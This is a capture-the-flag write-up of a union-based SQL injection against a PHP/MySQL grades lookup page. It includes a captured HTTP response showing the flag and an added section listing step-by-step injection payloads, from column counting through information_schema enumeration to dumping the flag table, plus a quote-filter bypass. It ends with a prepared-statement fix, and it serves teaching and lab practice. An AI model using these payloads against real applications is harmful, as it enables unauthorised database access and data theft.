This is a POST request that must hit a database behind the scenes, so SQL injection is worth trying.
Capture the request and start testing.
First confirm the injection point. The page renders 4 columns per row (a name plus the Math, English and Chinese scores), so the UNION SELECT has to supply 4 columns.
Start the union query.
Union-query injection yields the current account and its privileges (user()), the database name (database()) and the MySQL version (version()).
Next, enumerate the table names:
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1
The table name is fl4g.
Then fetch the column names of that table:
select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='fl4g' limit 0,1
The column is skctf_flag.
Now query the data:
HTTP/1.1 200 OK
Date: Fri, 29 Mar 2024 17:36:03 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 1236
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>学生成绩查询</title>
<meta charset="utf-8">
<style type='text/css' >
table {
border-collapse: collapse;
font-family: Futura, Arial, sans-serif;
margin:0 auto;
width: 1000px;
}
caption {
font-size: 24px;
margin: 1em auto;
}
th,td {
padding: .65em;
}
th {
background: #9E9E9E;
border: 1px solid #777;
color: #000;
}
td {
border: 1px solid#777;
}
form {
text-align:center;
}
</style>
</head>
<body>
<h2 style='text-align:center;'>成绩查询</h2>
<form action='index.php' method='post'>
<input style='width:300px;height:40px;font-size:18px;' type='text' name='id' placeholder='1,2,3...'/><br><br><br><br><br>
<input style='width:100px;height:40px;' type='submit' value='Submit'/>
</form>
<table>
<caption>flag{a34b11efc2550275f84b3374aa4b34c8}的成绩单</caption>
<thead>
<tr>
<th>Math
<th>English
<th>Chinese
</thead>
<tbody>
<tr>
<td>1<td>1<td>1</tbody>
</table></body>
</html>
Flag obtained.
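The full union-based chain described above, written out as MySQL statements. This is an added example, not the original writeup's payloads or the challenge's source. It assumes (hypothetically) that the back end runs SELECT name, math, english, chinese FROM score WHERE id = '<id>' with the POST value concatenated straight into the string, that a single quote closes the string and '#' comments out the rest, and that the first selected column is the one rendered in the <caption> (which is where the flag shows up in the captured response, with 1,1,1 in the score cells). The table name score and the column names are assumptions; fl4g and skctf_flag come from the writeup.

```sql
-- Added example (not from the original page). Each "payload:" comment is the
-- value sent in the POST parameter id; the statement below it is what the
-- assumed back-end query becomes after concatenation. Everything after '#'
-- is a MySQL comment, so the original closing quote is discarded.

-- 1. Confirm the injection point and the column count.
--    payload: 1' ORDER BY 4#   -> page renders normally
--    payload: 1' ORDER BY 5#   -> error or empty page: the query has 4 columns
SELECT name, math, english, chinese FROM score WHERE id = '1' ORDER BY 4#';

-- 2. Union in a controlled row. id=-1 matches nothing, so the only row the
--    page renders is ours; the number that appears in the caption tells us
--    which column is echoed (here column 1).
--    payload: -1' UNION SELECT 1,2,3,4#
SELECT name, math, english, chinese FROM score WHERE id = '-1'
UNION SELECT 1,2,3,4#';

-- 3. Account, database and version in one request. 0x7c is '|', used as a
--    separator without needing quote characters inside the payload.
--    payload: -1' UNION SELECT CONCAT(USER(),0x7c,DATABASE(),0x7c,VERSION()),2,3,4#
SELECT name, math, english, chinese FROM score WHERE id = '-1'
UNION SELECT CONCAT(USER(),0x7c,DATABASE(),0x7c,VERSION()),2,3,4#';

-- 4. Table names in the current schema. LIMIT 0,1 / LIMIT 1,1 walks them one
--    per request; GROUP_CONCAT returns them all at once (subject to
--    group_concat_max_len, 1024 bytes by default).
--    payload: -1' UNION SELECT (SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=DATABASE()),2,3,4#
SELECT name, math, english, chinese FROM score WHERE id = '-1'
UNION SELECT (SELECT GROUP_CONCAT(TABLE_NAME)
              FROM information_schema.TABLES
              WHERE TABLE_SCHEMA = DATABASE()),2,3,4#';
-- -> fl4g,score   (score is the assumed name of the grades table)

-- 5. Column names of fl4g. Filtering on TABLE_SCHEMA as well avoids picking
--    up a same-named table in another database.
--    payload: -1' UNION SELECT (SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME='fl4g'),2,3,4#
SELECT name, math, english, chinese FROM score WHERE id = '-1'
UNION SELECT (SELECT GROUP_CONCAT(COLUMN_NAME)
              FROM information_schema.COLUMNS
              WHERE TABLE_SCHEMA = DATABASE() AND TABLE_NAME = 'fl4g'),2,3,4#';
-- -> skctf_flag

-- 6. Dump the flag into the caption slot; the three score cells show 1,1,1,
--    which matches the captured response.
--    payload: -1' UNION SELECT (SELECT GROUP_CONCAT(skctf_flag) FROM fl4g),1,1,1#
SELECT name, math, english, chinese FROM score WHERE id = '-1'
UNION SELECT (SELECT GROUP_CONCAT(skctf_flag) FROM fl4g),1,1,1#';
```

If quotes are filtered, the TABLE_NAME='fl4g' comparison in step 5 can be replaced with TABLE_NAME=0x666c3467 (the hex encoding of the string), which MySQL compares as a string. The underlying defect is string concatenation of the id parameter; binding it as a prepared-statement parameter (PDO or mysqli with a placeholder) removes the whole chain regardless of what the value contains.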